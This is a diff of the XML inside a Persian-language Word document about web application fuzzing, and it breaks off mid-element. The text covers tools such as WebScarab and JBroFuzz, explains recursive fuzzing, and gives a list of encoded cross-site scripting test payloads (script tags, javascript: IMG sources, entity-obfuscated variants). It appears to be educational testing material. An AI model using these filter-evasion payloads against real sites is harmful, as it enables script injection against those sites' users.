+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> هستند که م</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31730,48 +30379,8 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-        </w:rPr>
-        <w:t>FUZZ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> هستند که م</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
         <w:t xml:space="preserve"> توانند با </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -31782,7 +30391,6 @@
         </w:rPr>
         <w:t>WebScarab</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -31794,7 +30402,6 @@
         </w:rPr>
         <w:t xml:space="preserve">، </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -31805,7 +30412,6 @@
         </w:rPr>
         <w:t>JBroFuzz</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -31817,7 +30423,6 @@
         </w:rPr>
         <w:t xml:space="preserve">، </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -31828,7 +30433,6 @@
         </w:rPr>
         <w:t>WSFuzzer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -33101,27 +31705,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Replacive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fuzzing</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>Replacive fuzzing</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -33452,7 +32044,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>RECURSIVE FUZZING</w:t>
       </w:r>
     </w:p>
@@ -33831,9 +32422,20 @@
           <w:szCs w:val="24"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">http://www.example.com/8302fa3b Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:  </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId20" w:history="1">
+        <w:t xml:space="preserve">http://www.example.com/8302fa3b Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">{0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -34017,19 +32619,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> تواند به عنوان </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>فرآ</w:t>
+        <w:t xml:space="preserve"> تواند به عنوان فرآ</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -34103,7 +32693,6 @@
         </w:rPr>
         <w:t>ی</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
@@ -34456,29 +33045,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>http://www.example.com/&gt;"&gt;&lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>alert(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>"XSS")&lt;/script&gt;&amp; http://www.example.com/'';!--"&lt;XSS&gt;=&amp;{()}</w:t>
+        <w:t>http://www.example.com/&gt;"&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&amp; http://www.example.com/'';!--"&lt;XSS&gt;=&amp;{()}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -34951,20 +33518,71 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:t>CROSS SITE SCRIPTING (XSS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;"&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&amp; "&gt;&lt;STYLE&gt;@import"javascript:alert('XSS')";&lt;/STYLE&gt; &gt;"'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23 x69;%26%23x70;%26%23x74;%26%23x3a;  alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt; '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "&gt; &gt;" '';!--"&lt;XSS&gt;=&amp;{()} &lt;IMG SRC="javascript:alert('XSS');"&gt; &lt;IMG SRC=javascript:alert('XSS')&gt; &lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;  &lt;IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS&lt;WBR&gt;&amp;quot;)&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>CROSS SITE SCRIPTING (XSS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">&lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;  &amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt; &lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;W BR&gt;#0000112&amp;#0000116&amp;#0000058 </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34974,343 +33592,66 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000 083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;             &lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72 &amp;#x74&amp;#x28  &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&gt;"&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&amp; "&gt;&lt;STYLE&gt;@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>import"javascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">&lt;IMG SRC="jav&amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');"&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">('XSS')";&lt;/STYLE&gt; &gt;"'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23 x69;%26%23x70;%26%23x74;%26%23x3a;  alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">&lt;IMG SRC="jav&amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');"&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt; '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "&gt; &gt;" '';!--"&lt;XSS&gt;=&amp;{()} &lt;IMG SRC="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:color w:val="000000" w:themeColor="text1"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>javascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>('XSS');"&gt; &lt;IMG SRC=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>javascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>('XSS')&gt; &lt;IMG SRC=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>JaVaScRiPt:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>('XSS')&gt;  &lt;IMG SRC=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>JaVaScRiPt:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>(&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>quot;XSS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&lt;WBR&gt;&amp;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>quot</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">;)&gt; &lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;  &amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt; &lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;W BR&gt;#0000112&amp;#0000116&amp;#0000058 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000 083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;             &lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72 &amp;#x74&amp;#x28  &amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&lt;IMG SRC="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>jav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&amp;#x09</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>;ascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(&lt;WBR&gt;'XSS');"&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&lt;IMG SRC="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>jav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&amp;#x0A</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>;ascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(&lt;WBR&gt;'XSS');"&gt; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&lt;IMG SRC="</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>jav</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>&amp;#x0D</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>;ascript:alert</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
